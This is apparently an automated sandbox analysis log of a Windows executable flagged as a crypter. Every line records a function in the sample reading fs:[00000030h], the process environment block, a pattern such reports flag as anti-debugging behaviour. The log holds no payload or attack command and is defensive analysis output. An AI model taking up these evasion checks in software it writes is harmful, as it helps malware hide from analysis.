Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov eax, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov ecx, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E01F8 mov eax, dword ptr fs:[00000030h] 5_2_016E01F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017861E5 mov eax, dword ptr fs:[00000030h] 5_2_017861E5
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E1D0 mov eax, dword ptr fs:[00000030h] 5_2_0172E1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E1D0 mov eax, dword ptr fs:[00000030h] 5_2_0172E1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E1D0 mov ecx, dword ptr fs:[00000030h] 5_2_0172E1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E1D0 mov eax, dword ptr fs:[00000030h] 5_2_0172E1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172E1D0 mov eax, dword ptr fs:[00000030h] 5_2_0172E1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017761C3 mov eax, dword ptr fs:[00000030h] 5_2_017761C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017761C3 mov eax, dword ptr fs:[00000030h] 5_2_017761C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017821AE mov eax, dword ptr fs:[00000030h] 5_2_017821AE
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F0185 mov eax, dword ptr fs:[00000030h] 5_2_016F0185
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173019F mov eax, dword ptr fs:[00000030h] 5_2_0173019F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173019F mov eax, dword ptr fs:[00000030h] 5_2_0173019F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173019F mov eax, dword ptr fs:[00000030h] 5_2_0173019F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173019F mov eax, dword ptr fs:[00000030h] 5_2_0173019F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01754180 mov eax, dword ptr fs:[00000030h] 5_2_01754180
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01754180 mov eax, dword ptr fs:[00000030h] 5_2_01754180
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AA197 mov eax, dword ptr fs:[00000030h] 5_2_016AA197
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AA197 mov eax, dword ptr fs:[00000030h] 5_2_016AA197
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AA197 mov eax, dword ptr fs:[00000030h] 5_2_016AA197
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176C188 mov eax, dword ptr fs:[00000030h] 5_2_0176C188
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176C188 mov eax, dword ptr fs:[00000030h] 5_2_0176C188
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DC073 mov eax, dword ptr fs:[00000030h] 5_2_016DC073
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01736050 mov eax, dword ptr fs:[00000030h] 5_2_01736050
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B2050 mov eax, dword ptr fs:[00000030h] 5_2_016B2050
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01746030 mov eax, dword ptr fs:[00000030h] 5_2_01746030
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AA020 mov eax, dword ptr fs:[00000030h] 5_2_016AA020
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AC020 mov eax, dword ptr fs:[00000030h] 5_2_016AC020
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01734000 mov ecx, dword ptr fs:[00000030h] 5_2_01734000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01752000 mov eax, dword ptr fs:[00000030h] 5_2_01752000
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE016 mov eax, dword ptr fs:[00000030h] 5_2_016CE016
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE016 mov eax, dword ptr fs:[00000030h] 5_2_016CE016
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE016 mov eax, dword ptr fs:[00000030h] 5_2_016CE016
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE016 mov eax, dword ptr fs:[00000030h] 5_2_016CE016
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B80E9 mov eax, dword ptr fs:[00000030h] 5_2_016B80E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AA0E3 mov ecx, dword ptr fs:[00000030h] 5_2_016AA0E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017360E0 mov eax, dword ptr fs:[00000030h] 5_2_017360E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AC0F0 mov eax, dword ptr fs:[00000030h] 5_2_016AC0F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F20F0 mov ecx, dword ptr fs:[00000030h] 5_2_016F20F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017320DE mov eax, dword ptr fs:[00000030h] 5_2_017320DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A80A0 mov eax, dword ptr fs:[00000030h] 5_2_016A80A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017760B8 mov eax, dword ptr fs:[00000030h] 5_2_017760B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017760B8 mov ecx, dword ptr fs:[00000030h] 5_2_017760B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017480A8 mov eax, dword ptr fs:[00000030h] 5_2_017480A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B208A mov eax, dword ptr fs:[00000030h] 5_2_016B208A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175437C mov eax, dword ptr fs:[00000030h] 5_2_0175437C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0177A352 mov eax, dword ptr fs:[00000030h] 5_2_0177A352
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01758350 mov ecx, dword ptr fs:[00000030h] 5_2_01758350
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173035C mov eax, dword ptr fs:[00000030h] 5_2_0173035C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173035C mov eax, dword ptr fs:[00000030h] 5_2_0173035C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173035C mov eax, dword ptr fs:[00000030h] 5_2_0173035C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173035C mov ecx, dword ptr fs:[00000030h] 5_2_0173035C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173035C mov eax, dword ptr fs:[00000030h] 5_2_0173035C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173035C mov eax, dword ptr fs:[00000030h] 5_2_0173035C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0178634F mov eax, dword ptr fs:[00000030h] 5_2_0178634F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01788324 mov eax, dword ptr fs:[00000030h] 5_2_01788324
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01788324 mov ecx, dword ptr fs:[00000030h] 5_2_01788324
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01788324 mov eax, dword ptr fs:[00000030h] 5_2_01788324
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01788324 mov eax, dword ptr fs:[00000030h] 5_2_01788324
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA30B mov eax, dword ptr fs:[00000030h] 5_2_016EA30B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA30B mov eax, dword ptr fs:[00000030h] 5_2_016EA30B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA30B mov eax, dword ptr fs:[00000030h] 5_2_016EA30B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AC310 mov ecx, dword ptr fs:[00000030h] 5_2_016AC310
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D0310 mov ecx, dword ptr fs:[00000030h] 5_2_016D0310
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C03E9 mov eax, dword ptr fs:[00000030h] 5_2_016C03E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E63FF mov eax, dword ptr fs:[00000030h] 5_2_016E63FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE3F0 mov eax, dword ptr fs:[00000030h] 5_2_016CE3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE3F0 mov eax, dword ptr fs:[00000030h] 5_2_016CE3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CE3F0 mov eax, dword ptr fs:[00000030h] 5_2_016CE3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017543D4 mov eax, dword ptr fs:[00000030h] 5_2_017543D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017543D4 mov eax, dword ptr fs:[00000030h] 5_2_017543D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA3C0 mov eax, dword ptr fs:[00000030h] 5_2_016BA3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA3C0 mov eax, dword ptr fs:[00000030h] 5_2_016BA3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA3C0 mov eax, dword ptr fs:[00000030h] 5_2_016BA3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA3C0 mov eax, dword ptr fs:[00000030h] 5_2_016BA3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA3C0 mov eax, dword ptr fs:[00000030h] 5_2_016BA3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA3C0 mov eax, dword ptr fs:[00000030h] 5_2_016BA3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B83C0 mov eax, dword ptr fs:[00000030h] 5_2_016B83C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B83C0 mov eax, dword ptr fs:[00000030h] 5_2_016B83C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B83C0 mov eax, dword ptr fs:[00000030h] 5_2_016B83C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B83C0 mov eax, dword ptr fs:[00000030h] 5_2_016B83C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E3DB mov eax, dword ptr fs:[00000030h] 5_2_0175E3DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E3DB mov eax, dword ptr fs:[00000030h] 5_2_0175E3DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E3DB mov ecx, dword ptr fs:[00000030h] 5_2_0175E3DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E3DB mov eax, dword ptr fs:[00000030h] 5_2_0175E3DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017363C0 mov eax, dword ptr fs:[00000030h] 5_2_017363C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176C3CD mov eax, dword ptr fs:[00000030h] 5_2_0176C3CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D438F mov eax, dword ptr fs:[00000030h] 5_2_016D438F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D438F mov eax, dword ptr fs:[00000030h] 5_2_016D438F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AE388 mov eax, dword ptr fs:[00000030h] 5_2_016AE388
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AE388 mov eax, dword ptr fs:[00000030h] 5_2_016AE388
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AE388 mov eax, dword ptr fs:[00000030h] 5_2_016AE388
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A8397 mov eax, dword ptr fs:[00000030h] 5_2_016A8397
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A8397 mov eax, dword ptr fs:[00000030h] 5_2_016A8397
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A8397 mov eax, dword ptr fs:[00000030h] 5_2_016A8397
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A826B mov eax, dword ptr fs:[00000030h] 5_2_016A826B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4260 mov eax, dword ptr fs:[00000030h] 5_2_016B4260
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4260 mov eax, dword ptr fs:[00000030h] 5_2_016B4260
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4260 mov eax, dword ptr fs:[00000030h] 5_2_016B4260
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0178625D mov eax, dword ptr fs:[00000030h] 5_2_0178625D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176A250 mov eax, dword ptr fs:[00000030h] 5_2_0176A250
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0176A250 mov eax, dword ptr fs:[00000030h] 5_2_0176A250
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01738243 mov eax, dword ptr fs:[00000030h] 5_2_01738243
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01738243 mov ecx, dword ptr fs:[00000030h] 5_2_01738243
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6259 mov eax, dword ptr fs:[00000030h] 5_2_016B6259
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AA250 mov eax, dword ptr fs:[00000030h] 5_2_016AA250
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A823B mov eax, dword ptr fs:[00000030h] 5_2_016A823B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C02E1 mov eax, dword ptr fs:[00000030h] 5_2_016C02E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C02E1 mov eax, dword ptr fs:[00000030h] 5_2_016C02E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C02E1 mov eax, dword ptr fs:[00000030h] 5_2_016C02E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA2C3 mov eax, dword ptr fs:[00000030h] 5_2_016BA2C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA2C3 mov eax, dword ptr fs:[00000030h] 5_2_016BA2C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA2C3 mov eax, dword ptr fs:[00000030h] 5_2_016BA2C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA2C3 mov eax, dword ptr fs:[00000030h] 5_2_016BA2C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BA2C3 mov eax, dword ptr fs:[00000030h] 5_2_016BA2C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017862D6 mov eax, dword ptr fs:[00000030h] 5_2_017862D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C02A0 mov eax, dword ptr fs:[00000030h] 5_2_016C02A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C02A0 mov eax, dword ptr fs:[00000030h] 5_2_016C02A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017462A0 mov eax, dword ptr fs:[00000030h] 5_2_017462A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017462A0 mov ecx, dword ptr fs:[00000030h] 5_2_017462A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017462A0 mov eax, dword ptr fs:[00000030h] 5_2_017462A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017462A0 mov eax, dword ptr fs:[00000030h] 5_2_017462A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017462A0 mov eax, dword ptr fs:[00000030h] 5_2_017462A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017462A0 mov eax, dword ptr fs:[00000030h] 5_2_017462A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE284 mov eax, dword ptr fs:[00000030h] 5_2_016EE284
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EE284 mov eax, dword ptr fs:[00000030h] 5_2_016EE284
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01730283 mov eax, dword ptr fs:[00000030h] 5_2_01730283
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01730283 mov eax, dword ptr fs:[00000030h] 5_2_01730283
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01730283 mov eax, dword ptr fs:[00000030h] 5_2_01730283
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E656A mov eax, dword ptr fs:[00000030h] 5_2_016E656A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E656A mov eax, dword ptr fs:[00000030h] 5_2_016E656A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E656A mov eax, dword ptr fs:[00000030h] 5_2_016E656A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8550 mov eax, dword ptr fs:[00000030h] 5_2_016B8550
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8550 mov eax, dword ptr fs:[00000030h] 5_2_016B8550
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE53E mov eax, dword ptr fs:[00000030h] 5_2_016DE53E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE53E mov eax, dword ptr fs:[00000030h] 5_2_016DE53E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE53E mov eax, dword ptr fs:[00000030h] 5_2_016DE53E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE53E mov eax, dword ptr fs:[00000030h] 5_2_016DE53E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE53E mov eax, dword ptr fs:[00000030h] 5_2_016DE53E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0535 mov eax, dword ptr fs:[00000030h] 5_2_016C0535
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0535 mov eax, dword ptr fs:[00000030h] 5_2_016C0535
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0535 mov eax, dword ptr fs:[00000030h] 5_2_016C0535
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0535 mov eax, dword ptr fs:[00000030h] 5_2_016C0535
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0535 mov eax, dword ptr fs:[00000030h] 5_2_016C0535
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0535 mov eax, dword ptr fs:[00000030h] 5_2_016C0535
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01746500 mov eax, dword ptr fs:[00000030h] 5_2_01746500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784500 mov eax, dword ptr fs:[00000030h] 5_2_01784500
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC5ED mov eax, dword ptr fs:[00000030h] 5_2_016EC5ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC5ED mov eax, dword ptr fs:[00000030h] 5_2_016EC5ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DE5E7 mov eax, dword ptr fs:[00000030h] 5_2_016DE5E7
